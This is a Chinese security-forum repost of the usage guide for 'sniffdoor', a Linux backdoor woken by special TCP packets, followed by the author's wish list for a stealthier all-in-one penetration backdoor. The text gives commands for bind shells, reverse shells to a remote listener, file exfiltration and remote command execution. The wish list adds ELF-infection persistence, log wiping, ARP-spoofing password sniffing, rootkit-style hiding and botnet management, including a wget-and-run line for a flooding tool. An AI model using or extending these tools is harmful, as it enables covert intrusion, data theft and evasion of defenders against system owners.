Linux sniffdoor v 1.0

软件作者:wzt <[email protected]>
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:文章首发www.XSec.org,后由原创作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。

SniffDoor V 1.0 (c) 2007 by wzt <[email protected]>
+————————————————–+

Sniffdoor is a linux backdoor woke up with a special
tcp packet.It can bind a shell with tty,it can send
files with tcp packet,that's means the server side
can sniff your files in the special tcp packets,
and save on its server.The client can send a shell
command with the packet,the server sniff and execute
it,so it can round the firewall.

+————————————————–+
[USAGE]:

server:

$make;
./sniffdoor

client:
$make;
./sniffclient

sniffdoor <options> [remote_ip] [port] [command]

<options>:
-packet <remote_ip> [port] <command>
-connect <remote ip> <port>
-listen <port>

<command>:
bind:<port>
back:<remote_ip> <port>
file:<filename>
comm:<command>

1. bindshell:
send tcp packet to host 61.155.217.56,and then it
bind a shell on port 999
./client -packet 61.155.217.56 bind:999
./client -packet 61.155.217.56 22 bind:999
port 22 is a active port on the host.

2.connect back door:
1).you server must listen a port first(your ip
is 123.45.64.57):
./client -listen 999

2).send tcp packet to host 61.155.217.56,and then
bind a shell to remote 123.45.64.57 on port 999
./client -packet 61.155.217.56 back:123.45.64.57:999
./client -packet 61.155.217.56 21 back:123.45.64.57:999

3.send file:
1).send file with tcp packet.
./client -packet 61.155.217.56 file:bind.c
./client -packet 61.155.217.56 80 file:bind.c

NOTE!
It can only send txt files , not binary files.
If you fixed up this bug,mail to me,thx.

4.execute command:
1).execute command with tcp packet.
./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"

+—————————————————–+

[THANKS]:

Thank baozi for testing the door all the time.

[END]:

send any bug to <[email protected]>.

-wzt

ps:最近在一个linux下的allinone,大家有什么好想法可以在此讨论下.

做一个allinone的渗透型后门,有了这个后门,我们就可以在linux里渗透其他的linux/windows,争取做到一sniffdoor在手,别无他求。
我有如下功能建议,大家多多提出自己的想法,包括大的功能上的和某个功能的某个细节上的,争取弄一个完美的linux渗透型后门。

1: htran with udp support 把windows下的htran移植进来,包括socks5(带用户密码) –>有点难度,比如client 发送 ip pack -proxy -bind eth0 port user pass –>接近完工

2:灵活的回连设置。

3:自动启动 ELF插入启动,注意宿主程序工作是否正常,感染程序名称等等问题。

4:通讯加密

5:portscanner with banner grabber

6:logcleaner –>难度很小,有点必要,呵呵,因为有其他的wipe了,当然,有就最好了

7:arp欺骗+网络sniffer弄进来,可以抓一些明文的密码,如果可以抓smb就超级强了 –>难度一般,比较必要,我觉得可以先把本机sniffer做出来,arp的以后再慢慢加

8:隐藏,隐藏,现在初步打算用fake proc name来忽悠一下,弄成-bash,呵呵,之后做个lkm来隐藏下,最好可以做到动态隐藏。

9:ttysniffer弄进来 –>难度十分之大,但十分必要

10:把client和server整合在一起,精简参数,打包的时候附带cygwin版本,以便在windows里使用。最好可以带上肉鸡管理功能,方便以后批量发送指令,例如wget ip/juno.c;gcc juno.c -o juno ; ./juno www.xxx.com 80 :)

11:httpd……………多线程………………………auth,port,directory,index,4个参数,呵呵。

./sniffclient -packet ip bind:9999
就会绑定9999端口

./sniffclient -packet ip back:11.22.33.44:9999

就把shell反弹到11.22.33.44的9999端口上

sniffcilent,sniffserver都需要root权限

下载地址(直接到邪八那里下吧):sniffdoor.tgz

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

发表评论